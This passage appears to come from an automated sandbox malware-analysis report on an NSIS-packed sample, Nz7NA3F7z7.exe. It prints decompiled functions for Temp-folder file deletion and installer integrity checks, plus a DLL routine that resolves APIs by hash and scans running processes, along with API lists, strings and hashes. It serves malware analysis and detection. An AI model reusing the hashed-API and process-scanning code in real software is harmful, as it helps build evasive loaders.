                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				struct _WIN32_FIND_DATAA _v332;
                                                                                    				signed int _t37;
                                                                                    				char* _t49;
                                                                                    				signed int _t52;
                                                                                    				signed int _t55;
                                                                                    				signed int _t61;
                                                                                    				signed int _t63;
                                                                                    				void* _t65;
                                                                                    				signed int _t68;
                                                                                    				CHAR* _t70;
                                                                                    				CHAR* _t72;
                                                                                    				char* _t75;
                                                                                    
                                                                                    				_t72 = _a4;
                                                                                    				_t37 = E0040579B(__eflags, _t72);
                                                                                    				_v12 = _t37;
                                                                                    				if((_a8 & 0x00000008) != 0) {
                                                                                    					_t63 = DeleteFileA(_t72); // executed
                                                                                    					asm("sbb eax, eax");
                                                                                    					_t65 =  ~_t63 + 1;
                                                                                    					 *0x42eca8 =  *0x42eca8 + _t65;
                                                                                    					return _t65;
                                                                                    				}
                                                                                    				_t68 = _a8 & 0x00000001;
                                                                                    				__eflags = _t68;
                                                                                    				_v8 = _t68;
                                                                                    				if(_t68 == 0) {
                                                                                    					L5:
                                                                                    					E00405BC7(0x42b0a8, _t72);
                                                                                    					__eflags = _t68;
                                                                                    					if(_t68 == 0) {
                                                                                    						E00405701(_t72);
                                                                                    					} else {
                                                                                    						lstrcatA(0x42b0a8, "\*.*");
                                                                                    					}
                                                                                    					__eflags =  *_t72;
                                                                                    					if( *_t72 != 0) {
                                                                                    						L10:
                                                                                    						lstrcatA(_t72, 0x409010);
                                                                                    						L11:
                                                                                    						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                    						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
                                                                                    						__eflags = _t37 - 0xffffffff;
                                                                                    						_a4 = _t37;
                                                                                    						if(_t37 == 0xffffffff) {
                                                                                    							L29:
                                                                                    							__eflags = _v8;
                                                                                    							if(_v8 != 0) {
                                                                                    								_t31 = _t70 - 1;
                                                                                    								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                    								__eflags =  *_t31;
                                                                                    							}
                                                                                    							goto L31;
                                                                                    						} else {
                                                                                    							goto L12;
                                                                                    						}
                                                                                    						do {
                                                                                    							L12:
                                                                                    							_t75 =  &(_v332.cFileName);
                                                                                    							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
                                                                                    							__eflags =  *_t49;
                                                                                    							if( *_t49 != 0) {
                                                                                    								__eflags = _v332.cAlternateFileName;
                                                                                    								if(_v332.cAlternateFileName != 0) {
                                                                                    									_t75 =  &(_v332.cAlternateFileName);
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *_t75 - 0x2e;
                                                                                    							if( *_t75 != 0x2e) {
                                                                                    								L19:
                                                                                    								E00405BC7(_t70, _t75);
                                                                                    								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                    								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                    									E0040587F(_t72);
                                                                                    									_t52 = DeleteFileA(_t72);
                                                                                    									__eflags = _t52;
                                                                                    									if(_t52 != 0) {
                                                                                    										E00404EB3(0xfffffff2, _t72);
                                                                                    									} else {
                                                                                    										__eflags = _a8 & 0x00000004;
                                                                                    										if((_a8 & 0x00000004) == 0) {
                                                                                    											 *0x42eca8 =  *0x42eca8 + 1;
                                                                                    										} else {
                                                                                    											E00404EB3(0xfffffff1, _t72);
                                                                                    											E00405915(__eflags, _t72, 0);
                                                                                    										}
                                                                                    									}
                                                                                    								} else {
                                                                                    									__eflags = (_a8 & 0x00000003) - 3;
                                                                                    									if(__eflags == 0) {
                                                                                    										E004054EC(_t70, __eflags, _t72, _a8);
                                                                                    									}
                                                                                    								}
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                    							__eflags = _t61;
                                                                                    							if(_t61 == 0) {
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							__eflags = _t61 - 0x2e;
                                                                                    							if(_t61 != 0x2e) {
                                                                                    								goto L19;
                                                                                    							}
                                                                                    							__eflags =  *((char*)(_t75 + 2));
                                                                                    							if( *((char*)(_t75 + 2)) == 0) {
                                                                                    								goto L27;
                                                                                    							}
                                                                                    							goto L19;
                                                                                    							L27:
                                                                                    							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                    							__eflags = _t55;
                                                                                    						} while (_t55 != 0);
                                                                                    						_t37 = FindClose(_a4);
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					__eflags =  *0x42b0a8 - 0x5c;
                                                                                    					if( *0x42b0a8 != 0x5c) {
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					__eflags = _t37;
                                                                                    					if(_t37 == 0) {
                                                                                    						L31:
                                                                                    						__eflags = _v8;
                                                                                    						if(_v8 == 0) {
                                                                                    							L39:
                                                                                    							return _t37;
                                                                                    						}
                                                                                    						__eflags = _v12;
                                                                                    						if(_v12 != 0) {
                                                                                    							_t37 = E00405EC2(_t72);
                                                                                    							__eflags = _t37;
                                                                                    							if(_t37 == 0) {
                                                                                    								goto L39;
                                                                                    							}
                                                                                    							E004056BA(_t72);
                                                                                    							E0040587F(_t72);
                                                                                    							_t37 = RemoveDirectoryA(_t72);
                                                                                    							__eflags = _t37;
                                                                                    							if(_t37 != 0) {
                                                                                    								return E00404EB3(0xffffffe5, _t72);
                                                                                    							}
                                                                                    							__eflags = _a8 & 0x00000004;
                                                                                    							if((_a8 & 0x00000004) == 0) {
                                                                                    								goto L33;
                                                                                    							}
                                                                                    							E00404EB3(0xfffffff1, _t72);
                                                                                    							return E00405915(__eflags, _t72, 0);
                                                                                    						}
                                                                                    						L33:
                                                                                    						 *0x42eca8 =  *0x42eca8 + 1;
                                                                                    						return _t37;
                                                                                    					}
                                                                                    					__eflags = _a8 & 0x00000002;
                                                                                    					if((_a8 & 0x00000002) == 0) {
                                                                                    						goto L31;
                                                                                    					}
                                                                                    					goto L5;
                                                                                    				}
                                                                                    			}

















                                                                                    0x004054f7
                                                                                    0x004054fb
                                                                                    0x00405504
                                                                                    0x00405507
                                                                                    0x0040550a
                                                                                    0x00405512
                                                                                    0x00405514
                                                                                    0x00405515
                                                                                    0x00000000
                                                                                    0x00405515
                                                                                    0x00405524
                                                                                    0x00405524
                                                                                    0x00405527
                                                                                    0x0040552a
                                                                                    0x0040553e
                                                                                    0x00405545
                                                                                    0x0040554a
                                                                                    0x0040554c
                                                                                    0x0040555c
                                                                                    0x0040554e
                                                                                    0x00405554
                                                                                    0x00405554
                                                                                    0x00405561
                                                                                    0x00405564
                                                                                    0x0040556f
                                                                                    0x00405575
                                                                                    0x0040557a
                                                                                    0x0040558a
                                                                                    0x0040558c
                                                                                    0x00405592
                                                                                    0x00405595
                                                                                    0x00405598
                                                                                    0x00405655
                                                                                    0x00405655
                                                                                    0x00405659
                                                                                    0x0040565b
                                                                                    0x0040565b
                                                                                    0x0040565b
                                                                                    0x0040565b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040559e
                                                                                    0x0040559e
                                                                                    0x004055a7
                                                                                    0x004055ad
                                                                                    0x004055b2
                                                                                    0x004055b5
                                                                                    0x004055b7
                                                                                    0x004055bb
                                                                                    0x004055bd
                                                                                    0x004055bd
                                                                                    0x004055bb
                                                                                    0x004055c0
                                                                                    0x004055c3
                                                                                    0x004055d6
                                                                                    0x004055d8
                                                                                    0x004055dd
                                                                                    0x004055e4
                                                                                    0x004055fc
                                                                                    0x00405602
                                                                                    0x00405608
                                                                                    0x0040560a
                                                                                    0x0040562f
                                                                                    0x0040560c
                                                                                    0x0040560c
                                                                                    0x00405610
                                                                                    0x00405624
                                                                                    0x00405612
                                                                                    0x00405615
                                                                                    0x0040561d
                                                                                    0x0040561d
                                                                                    0x00405610
                                                                                    0x004055e6
                                                                                    0x004055ec
                                                                                    0x004055ee
                                                                                    0x004055f4
                                                                                    0x004055f4
                                                                                    0x004055ee
                                                                                    0x00000000
                                                                                    0x004055e4
                                                                                    0x004055c5
                                                                                    0x004055c8
                                                                                    0x004055ca
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004055cc
                                                                                    0x004055ce
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004055d0
                                                                                    0x004055d4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405634
                                                                                    0x0040563e
                                                                                    0x00405644
                                                                                    0x00405644
                                                                                    0x0040564f
                                                                                    0x00000000
                                                                                    0x0040564f
                                                                                    0x00405566
                                                                                    0x0040556d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040552c
                                                                                    0x0040552c
                                                                                    0x0040552e
                                                                                    0x0040565f
                                                                                    0x00405662
                                                                                    0x00405665
                                                                                    0x004056b7
                                                                                    0x004056b7
                                                                                    0x004056b7
                                                                                    0x00405667
                                                                                    0x0040566a
                                                                                    0x00405675
                                                                                    0x0040567a
                                                                                    0x0040567c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040567f
                                                                                    0x00405685
                                                                                    0x0040568b
                                                                                    0x00405691
                                                                                    0x00405693
                                                                                    0x00000000
                                                                                    0x004056af
                                                                                    0x00405695
                                                                                    0x00405699
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040569e
                                                                                    0x00000000
                                                                                    0x004056a5
                                                                                    0x0040566c
                                                                                    0x0040566c
                                                                                    0x00000000
                                                                                    0x0040566c
                                                                                    0x00405534
                                                                                    0x00405538
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405538

                                                                                    APIs
                                                                                    • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                                                    • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                                                    • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                                                    • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                                                    • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                                                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                                                                    • FindClose.KERNEL32(?), ref: 0040564F
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\Nz7NA3F7z7.exe" , xrefs: 004054EC
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                                                                    • \*.*, xrefs: 0040554E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                    • API String ID: 2035342205-2257158756
                                                                                    • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                    • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                    • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                                                    • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E73794225(void* __eflags, intOrPtr _a4) {
                                                                                    				intOrPtr _v8;
                                                                                    				void* _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v544;
                                                                                    				void* _v580;
                                                                                    				struct tagPROCESSENTRY32W* _t25;
                                                                                    
                                                                                    				_v8 = E737946E6();
                                                                                    				_v16 = E7379478E(_v8, 0xea31d3b6);
                                                                                    				_v20 = E7379478E(_v8, 0x5c7bf6e9);
                                                                                    				_v24 = E7379478E(_v8, 0x873d1860);
                                                                                    				_v12 = CreateToolhelp32Snapshot(2, 0);
                                                                                    				if(_v12 != 0xffffffff) {
                                                                                    					_v580 = 0x22c;
                                                                                    					_t25 =  &_v580;
                                                                                    					Process32FirstW(_v12, _t25);
                                                                                    					if(_t25 != 0) {
                                                                                    						while(E737941E1( &_v544) != _a4) {
                                                                                    							if(Process32NextW(_v12,  &_v580) != 0) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							return 0;
                                                                                    						}
                                                                                    						return 1;
                                                                                    					}
                                                                                    					return 0;
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x73794233
                                                                                    0x73794243
                                                                                    0x73794253
                                                                                    0x73794263
                                                                                    0x7379426d
                                                                                    0x73794274
                                                                                    0x7379427a
                                                                                    0x73794284
                                                                                    0x7379428e
                                                                                    0x73794293
                                                                                    0x73794299
                                                                                    0x737942be
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x737942c0
                                                                                    0x00000000
                                                                                    0x737942ac
                                                                                    0x00000000
                                                                                    0x73794295
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 7379426A
                                                                                    • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 7379428E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 2353314856-0
                                                                                    • Opcode ID: 3f52e8ac9aa48969a2cf3d14fc8a405bebc7fcdbccb52713b05fb7c6454309ed
                                                                                    • Instruction ID: 87494e6ae7f8d481e3c50c3f765e2f29cf0beb9181f46bd56e067940b67837dc
                                                                                    • Opcode Fuzzy Hash: 3f52e8ac9aa48969a2cf3d14fc8a405bebc7fcdbccb52713b05fb7c6454309ed
                                                                                    • Instruction Fuzzy Hash: B4112A74D0022DBFEB21DFB0ED4ABADBBB8FF04310F1046A5E915E6154E7304A509A59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405EC2(CHAR* _a4) {
                                                                                    				void* _t2;
                                                                                    
                                                                                    				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
                                                                                    				if(_t2 == 0xffffffff) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				FindClose(_t2);
                                                                                    				return 0x42c0f0;
                                                                                    			}




                                                                                    0x00405ecd
                                                                                    0x00405ed6
                                                                                    0x00000000
                                                                                    0x00405ee3
                                                                                    0x00405ed9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                    • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                    • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                    • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E00402C55(void* __eflags, signed int _a4) {
                                                                                    				DWORD* _v8;
                                                                                    				DWORD* _v12;
                                                                                    				void* _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				long _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				signed int _v44;
                                                                                    				long _t43;
                                                                                    				long _t50;
                                                                                    				void* _t53;
                                                                                    				void* _t57;
                                                                                    				intOrPtr* _t59;
                                                                                    				long _t60;
                                                                                    				long _t70;
                                                                                    				void* _t71;
                                                                                    				signed int _t77;
                                                                                    				intOrPtr _t80;
                                                                                    				long _t82;
                                                                                    				void* _t85;
                                                                                    				signed int _t87;
                                                                                    				void* _t89;
                                                                                    				long _t90;
                                                                                    				long _t93;
                                                                                    				void* _t94;
                                                                                    
                                                                                    				_t82 = 0;
                                                                                    				_v12 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_t43 = GetTickCount();
                                                                                    				_t91 = "C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe";
                                                                                    				 *0x42ec2c = _t43 + 0x3e8;
                                                                                    				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\Nz7NA3F7z7.exe", 0x400);
                                                                                    				_t89 = E0040589E(_t91, 0x80000000, 3);
                                                                                    				_v16 = _t89;
                                                                                    				 *0x409014 = _t89;
                                                                                    				if(_t89 == 0xffffffff) {
                                                                                    					return "Error launching installer";
                                                                                    				}
                                                                                    				_t92 = "C:\\Users\\hardz\\Desktop";
                                                                                    				E00405BC7("C:\\Users\\hardz\\Desktop", _t91);
                                                                                    				E00405BC7(0x436000, E00405701(_t92));
                                                                                    				_t50 = GetFileSize(_t89, 0);
                                                                                    				 *0x428c50 = _t50;
                                                                                    				_t93 = _t50;
                                                                                    				if(_t50 <= 0) {
                                                                                    					L24:
                                                                                    					E00402BF1(1);
                                                                                    					if( *0x42ec34 == _t82) {
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					if(_v8 == _t82) {
                                                                                    						L28:
                                                                                    						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                    						_t94 = _t53;
                                                                                    						E004030E2( *0x42ec34 + 0x1c);
                                                                                    						_push(_v24);
                                                                                    						_push(_t94);
                                                                                    						_push(_t82);
                                                                                    						_push(0xffffffff); // executed
                                                                                    						_t57 = E00402E8E(); // executed
                                                                                    						if(_t57 == _v24) {
                                                                                    							 *0x42ec30 = _t94;
                                                                                    							 *0x42ec38 =  *_t94;
                                                                                    							if((_v44 & 0x00000001) != 0) {
                                                                                    								 *0x42ec3c =  *0x42ec3c + 1;
                                                                                    							}
                                                                                    							_t40 = _t94 + 0x44; // 0x44
                                                                                    							_t59 = _t40;
                                                                                    							_t85 = 8;
                                                                                    							do {
                                                                                    								_t59 = _t59 - 8;
                                                                                    								 *_t59 =  *_t59 + _t94;
                                                                                    								_t85 = _t85 - 1;
                                                                                    							} while (_t85 != 0);
                                                                                    							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                    							 *(_t94 + 0x3c) = _t60;
                                                                                    							E0040585F(0x42ec40, _t94 + 4, 0x40);
                                                                                    							return 0;
                                                                                    						}
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					E004030E2( *0x414c40);
                                                                                    					if(E004030B0( &_a4, 4) == 0 || _v12 != _a4) {
                                                                                    						goto L29;
                                                                                    					} else {
                                                                                    						goto L28;
                                                                                    					}
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_t90 = _t93;
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t70 = ( ~( *0x42ec34) & 0x00007e00) + 0x200;
                                                                                    						if(_t93 >= _t70) {
                                                                                    							_t90 = _t70;
                                                                                    						}
                                                                                    						_t71 = E004030B0(0x420c50, _t90); // executed
                                                                                    						if(_t71 == 0) {
                                                                                    							E00402BF1(1);
                                                                                    							L29:
                                                                                    							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                    						}
                                                                                    						if( *0x42ec34 != 0) {
                                                                                    							if((_a4 & 0x00000002) == 0) {
                                                                                    								E00402BF1(0);
                                                                                    							}
                                                                                    							goto L20;
                                                                                    						}
                                                                                    						E0040585F( &_v44, 0x420c50, 0x1c);
                                                                                    						_t77 = _v44;
                                                                                    						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                                                    							_a4 = _a4 | _t77;
                                                                                    							_t87 =  *0x414c40; // 0x8600
                                                                                    							 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
                                                                                    							_t80 = _v20;
                                                                                    							 *0x42ec34 = _t87;
                                                                                    							if(_t80 > _t93) {
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                    								_v8 = _v8 + 1;
                                                                                    								_t93 = _t80 - 4;
                                                                                    								if(_t90 > _t93) {
                                                                                    									_t90 = _t93;
                                                                                    								}
                                                                                    								goto L20;
                                                                                    							} else {
                                                                                    								break;
                                                                                    							}
                                                                                    						}
                                                                                    						L20:
                                                                                    						if(_t93 <  *0x428c50) {
                                                                                    							_v12 = E00405FC6(_v12, 0x420c50, _t90);
                                                                                    						}
                                                                                    						 *0x414c40 =  *0x414c40 + _t90;
                                                                                    						_t93 = _t93 - _t90;
                                                                                    					} while (_t93 > 0);
                                                                                    					_t82 = 0;
                                                                                    					goto L24;
                                                                                    				}
                                                                                    			}






























                                                                                    0x00402c5d
                                                                                    0x00402c60
                                                                                    0x00402c63
                                                                                    0x00402c66
                                                                                    0x00402c6c
                                                                                    0x00402c7d
                                                                                    0x00402c82
                                                                                    0x00402c95
                                                                                    0x00402c9a
                                                                                    0x00402c9d
                                                                                    0x00402ca3
                                                                                    0x00000000
                                                                                    0x00402ca5
                                                                                    0x00402cb0
                                                                                    0x00402cb6
                                                                                    0x00402cc7
                                                                                    0x00402cce
                                                                                    0x00402cd6
                                                                                    0x00402cdb
                                                                                    0x00402cdd
                                                                                    0x00402dca
                                                                                    0x00402dcc
                                                                                    0x00402dd8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402ddd
                                                                                    0x00402e01
                                                                                    0x00402e06
                                                                                    0x00402e0c
                                                                                    0x00402e17
                                                                                    0x00402e1c
                                                                                    0x00402e1f
                                                                                    0x00402e20
                                                                                    0x00402e21
                                                                                    0x00402e23
                                                                                    0x00402e2b
                                                                                    0x00402e42
                                                                                    0x00402e4a
                                                                                    0x00402e4f
                                                                                    0x00402e51
                                                                                    0x00402e51
                                                                                    0x00402e59
                                                                                    0x00402e59
                                                                                    0x00402e5c
                                                                                    0x00402e5d
                                                                                    0x00402e5d
                                                                                    0x00402e60
                                                                                    0x00402e62
                                                                                    0x00402e62
                                                                                    0x00402e6c
                                                                                    0x00402e72
                                                                                    0x00402e80
                                                                                    0x00000000
                                                                                    0x00402e85
                                                                                    0x00000000
                                                                                    0x00402e2b
                                                                                    0x00402de5
                                                                                    0x00402df7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402ce3
                                                                                    0x00402ce8
                                                                                    0x00402ced
                                                                                    0x00402cf1
                                                                                    0x00402cf8
                                                                                    0x00402cff
                                                                                    0x00402d01
                                                                                    0x00402d01
                                                                                    0x00402d05
                                                                                    0x00402d0c
                                                                                    0x00402e36
                                                                                    0x00402e2d
                                                                                    0x00000000
                                                                                    0x00402e2d
                                                                                    0x00402d19
                                                                                    0x00402d99
                                                                                    0x00402d9d
                                                                                    0x00402da2
                                                                                    0x00000000
                                                                                    0x00402d99
                                                                                    0x00402d22
                                                                                    0x00402d27
                                                                                    0x00402d2f
                                                                                    0x00402d55
                                                                                    0x00402d5b
                                                                                    0x00402d64
                                                                                    0x00402d6a
                                                                                    0x00402d6f
                                                                                    0x00402d75
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d7f
                                                                                    0x00402d87
                                                                                    0x00402d8a
                                                                                    0x00402d8f
                                                                                    0x00402d91
                                                                                    0x00402d91
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402d7f
                                                                                    0x00402da3
                                                                                    0x00402da9
                                                                                    0x00402db5
                                                                                    0x00402db5
                                                                                    0x00402db8
                                                                                    0x00402dbe
                                                                                    0x00402dc0
                                                                                    0x00402dc8
                                                                                    0x00000000
                                                                                    0x00402dc8

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402C66
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Nz7NA3F7z7.exe,00000400), ref: 00402C82
                                                                                      • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 004058A2
                                                                                      • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nz7NA3F7z7.exe,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 00402CCE
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\Nz7NA3F7z7.exe" , xrefs: 00402C55
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                                                    • C:\Users\user\Desktop\Nz7NA3F7z7.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                                                    • Inst, xrefs: 00402D3A
                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                                                    • Error launching installer, xrefs: 00402CA5
                                                                                    • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                                                    • Null, xrefs: 00402D4C
                                                                                    • soft, xrefs: 00402D43
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nz7NA3F7z7.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                    • API String ID: 4283519449-1505292531
                                                                                    • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
